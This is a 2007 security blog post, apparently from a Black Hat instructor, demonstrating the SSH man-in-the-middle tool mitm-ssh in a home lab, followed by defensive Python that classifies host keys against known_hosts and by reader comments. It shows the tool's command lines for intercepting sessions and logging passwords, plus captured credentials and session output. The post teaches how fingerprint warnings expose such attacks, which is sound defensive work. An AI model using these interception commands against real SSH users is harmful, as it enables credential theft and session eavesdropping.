Thursday, August 16, 2007

Loving the SSH

I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.

How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.

Speaking of SSH, one of my Black Hat students brought an SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:

In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1

I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.

I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.

richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub

Once I log in you can see the fingerprints for both keys.

Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh

..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN

Usage: mitm-ssh [option(s)]

Routes:
[:] - Static route to port on host
(for non NAT connections)

Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read

Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied

Now I connect to localhost to show the correct key entered into known_hosts.

richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686

richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub

Now I connect to localhost port 2222 where mitm-ssh is listening.

richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri

I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:

$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub

Here is how mitm-ssh sees the activity.

WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22

[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

[MITM] Connection from UNKNOWN:48216 closed

Here's some of the info collected. First, usernames and passwords.

$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

Now data from the client.

$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22

Odd, it didn't record anything there. Here's (some) data from the server.

...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...

That file shows data from client and server.

Incidentally, SSH v1 is disabled on 10.1.13.4:

richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2

In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.
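The two warnings above are worth reading as a client-side decision procedure: the same host presenting a changed fingerprint, or a known host suddenly offering a key of a type never recorded for it, is the only signal an SSH user gets that something sits between them and the real server. The following Python is an added illustration, not code from the post or from mitm-ssh. It reproduces the old colon-separated MD5 fingerprint format that ssh-keygen -l printed in 2007, parses plain (unhashed) known_hosts lines, and classifies an offered host key into the four outcomes a client can hit. All keys and the known_hosts content are constructed synthetic blobs in SSH wire format, not real keys.

```python
import base64
import hashlib
import re
import struct

# Assumed/constructed: every key below is a synthetic blob built in SSH
# wire format purely so the fingerprint code has something to hash. None
# of them is a real key from the post, and none is cryptographically usable.


def _ssh_string(data):
    """Encode one SSH wire-format string: 4-byte big-endian length, then bytes."""
    return struct.pack(">I", len(data)) + data


def make_public_key_line(key_type, *fields):
    """Build an OpenSSH-style public key line: '<type> <base64 blob> <comment>'."""
    blob = _ssh_string(key_type.encode()) + b"".join(_ssh_string(f) for f in fields)
    return "%s %s constructed@example" % (key_type, base64.b64encode(blob).decode())


def md5_fingerprint(pubkey_line):
    """Old-style OpenSSH fingerprint as 'ssh-keygen -l' printed it in 2007:
    MD5 over the decoded key blob, shown as 16 colon-separated hex bytes."""
    fields = pubkey_line.split()
    digest = hashlib.md5(base64.b64decode(fields[1])).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def parse_known_hosts(text):
    """Map (host, key_type) -> fingerprint for plain (unhashed) known_hosts
    lines. Hashed '|1|' entries, comments and '@' marker lines are skipped."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "|1|", "@")):
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        hosts, key_type, b64 = parts[:3]
        fp = md5_fingerprint("%s %s" % (key_type, b64))
        for host in hosts.split(","):
            table[(host, key_type)] = fp
    return table


def classify_offered_key(known, host, key_type, pubkey_line):
    """Mirror the decision an SSH client makes when a server presents a host
    key. Returns (verdict, fingerprint) where verdict is one of:
      'match'    - host and key type known, fingerprint identical
      'changed'  - host and key type known, fingerprint differs
                   (the 'REMOTE HOST IDENTIFICATION HAS CHANGED' case)
      'new-type' - host known only under other key types
                   (the 'keys of different type are already known' case)
      'unknown'  - host never seen before
    """
    fp = md5_fingerprint(pubkey_line)
    if (host, key_type) in known:
        return ("match" if known[(host, key_type)] == fp else "changed", fp)
    if any(h == host for (h, _) in known):
        return ("new-type", fp)
    return ("unknown", fp)


# Constructed sample material (not real keys): the "legitimate" DSA key that
# localhost's sshd would present, a rogue DSA key, and an RSA key standing in
# for the one a proxy like mitm-ssh generates for itself.
LEGIT_DSA = make_public_key_line("ssh-dss", b"\x7f\x01", b"\x03", b"\x02", b"\x19")
ROGUE_DSA = make_public_key_line("ssh-dss", b"\x7f\x01", b"\x03", b"\x02", b"\x1a")
PROXY_RSA = make_public_key_line("ssh-rsa", b"\x01\x00\x01", b"\x00\xc9\x1b")

# Constructed known_hosts content: only localhost's DSA key has been accepted.
KNOWN_HOSTS = "# constructed sample\nlocalhost,127.0.0.1 %s\n" % LEGIT_DSA
KNOWN = parse_known_hosts(KNOWN_HOSTS)

FINGERPRINT_RE = re.compile(r"^([0-9a-f]{2}:){15}[0-9a-f]{2}$")


if __name__ == "__main__":
    # 192.0.2.10 is a constructed, never-seen host from the documentation range.
    for host, ktype, line in [("localhost", "ssh-dss", LEGIT_DSA),
                              ("localhost", "ssh-dss", ROGUE_DSA),
                              ("localhost", "ssh-rsa", PROXY_RSA),
                              ("192.0.2.10", "ssh-dss", LEGIT_DSA)]:
        verdict, fp = classify_offered_key(KNOWN, host, ktype, line)
        print("%-10s %-8s %-9s %s" % (host, ktype, verdict, fp))
```

The 'new-type' verdict is the interesting one: OpenSSH of that era treated it as a soft prompt rather than a hard failure, which is exactly why the localhost:2222 session above sailed through after a "yes". Pinning every key type the real server offers in known_hosts, and refusing rather than prompting on anything other than 'match', removes that gap.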

4 comments:

Anonymous said...

I think it's pleasegivemeallyourpasswords.

But yeah, I'm not sure about feeding my ssh passwords into a site, and even though it is RoR, why would you really want to add another layer of complexity into what is essentially a security function?

It's a cool demonstration of the technology's potential, no doubt.

Richard Bejtlich said...

http://www-personal.umich.edu/~mressl/webshell/

John Ward said...

I've seen these before. I prefer Mindterm, mainly because it is a Java app that runs on the client machine, no silliness with running SSH on some unknown person's box ready to steal your passwords. Even if the site is legit, how long until they become the target for attackers looking to steal passwords from suckers using this service?

Anonymous said...

Setting the StrictHostKeyChecking flag to yes is very much recommended; ssh will refuse to connect to hosts whose key has changed.